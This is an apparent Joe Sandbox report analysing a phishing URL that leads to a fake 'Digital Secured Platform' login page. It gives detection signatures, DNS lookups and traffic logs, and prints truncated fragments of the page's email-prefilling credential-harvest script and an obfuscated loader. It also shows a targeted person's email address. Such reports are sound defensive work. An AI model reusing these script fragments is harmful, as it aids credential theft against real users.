Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVp

Overview

General Information

Sample URL:https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVp
Analysis ID:1501324

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Javascript uses Clearbit API to dynamically determine company logos
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVp MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1940,i,8345449339001585819,190162441382419748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1udWk9Cz9tbnVpIUZRWlVEUEUiPQs#barry.doan@firstontariocu.comLLM: Score: 8 Reasons: The domain 'farmboyclothing.com' does not match the brand name 'Document Encryption', which is a common indicator of phishing attempts. Additionally, the presence of a sign-in form and a dark background with white text is a common design choice for login pages, which is appropriate for a secure service like document encryption, but it's still suspicious given the mismatched domain name. DOM: 5.0.pages.csv
Source: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1ud...HTTP Parser: function isbase64(str) { if (str === '' || string(str).trim() === '') { return false } try { if (btoa(atob(str)) == atob(btoa(str))) return true } catch { return false } } function getemail() { let email = ""; if (window.location.hash) { email = window.location.hash.substring(1); email = isbase64(email) ? window.atob(email) : email; } return email; } let count = 0, email = getemail(); document.addeventlistener('domcontentloaded', () => { if (email.match(/([a-za-z0-9._+-]+@[a-za-z0-9._-]+\.[a-za-z0-9._-]+)/gi)) { document.getelementbyid("email").value = email; let domain = email.substring(email.lastindexof("@") + 1); document.getelementbyid("img-field").src = `https://logo.clearbit.com/${domain}`; } document.getelementbyid("submit-btn").addeventlistener("click", event => { event.preventdefault ? event.preventdefault() : even...
Source: https://knectit.co.uk/index.jsHTTP Parser: var _0xc9a22d=_0x5386;function _0x5386(_0x2480e7,_0xfc8633){var _0x3e65d7=_0x5cf7();return _0x5386=function(_0x356ca6,_0x470a02){_0x356ca6=_0x356ca6-0xe0;var _0x4c1580=_0x3e65d7[_0x356ca6];return _0x4c1580;},_0x5386(_0x2480e7,_0xfc8633);}(function(_0x295d12,_0x559525){var _0x3880c3=_0x5386,_0x7f5ecc=_0x295d12();while(!![]){try{var _0x5bf32c=-parseint(_0x3880c3(0xe6))/0x1+-parseint(_0x3880c3(0xf5))/0x2*(parseint(_0x3880c3(0xe3))/0x3)+-parseint(_0x3880c3(0xec))/0x4*(parseint(_0x3880c3(0xf2))/0x5)+parseint(_0x3880c3(0xf3))/0x6+-parseint(_0x3880c3(0xeb))/0x7*(-parseint(_0x3880c3(0xf9))/0x8)+-parseint(_0x3880c3(0xe7))/0x9*(-parseint(_0x3880c3(0xe2))/0xa)+-parseint(_0x3880c3(0xf8))/0xb*(parseint(_0x3880c3(0xed))/0xc);if(_0x5bf32c===_0x559525)break;else _0x7f5ecc['push'](_0x7f5ecc['shift']());}catch(_0x5cadfe){_0x7f5ecc['push'](_0x7f5ecc['shift']());}}}(_0x5cf7,0x6662b));var _0x2028b4=(function(){var _0x23e0d9=!![];return function(_0x5d1363,_0x1abaf6){var _0x18a1a5=_0x23e0d9?function(){var _0x3b7949=_0x5386;if(_0x1a...
Source: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1ud...HTTP Parser: Number of links: 0
Source: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1ud...HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1ud...HTTP Parser: Total embedded image size: 270168
Source: https://connect.intuit.com/t/scs-v1-77680828184847679aa6ceba887a2701e0cbde088b7640928428df28d81e1777b790a67867b846368d2937c8c4f4b81c?cta=viewinvoicenow&locale=en_US#barry.doan@firstontariocu.comHTTP Parser: Base64 decoded: {"alg":"HS256","typ":"JWT"}
Source: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1ud...HTTP Parser: Title: Digital Secured Platform | Qualia does not match URL
Source: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1ud...HTTP Parser: <input type="password" .../> found
Source: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1udHTTP Parser: No <meta name="author".. found
Source: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1ud...HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.134:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49825 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: global trafficDNS traffic detected: DNS query: outbound.knectit.co.uk
Source: global trafficDNS traffic detected: DNS query: non2famine.swerner3055.workers.dev
Source: global trafficDNS traffic detected: DNS query: farmboyclothing.com
Source: global trafficDNS traffic detected: DNS query: knectit.co.uk
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
Source: global trafficDNS traffic detected: DNS query: logs-ghexb7h3g8djhjhq.eastus-01.azurewebsites.net
Source: global trafficDNS traffic detected: DNS query: connect.intuit.com
Source: global trafficDNS traffic detected: DNS query: static.cns-icn-prod.a.intuit.com
Source: global trafficDNS traffic detected: DNS query: c38.qbo.intuit.com
Source: global trafficDNS traffic detected: DNS query: cdn.segment.com
Source: global trafficDNS traffic detected: DNS query: smx.intuit.com
Source: global trafficDNS traffic detected: DNS query: eventbus.intuit.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
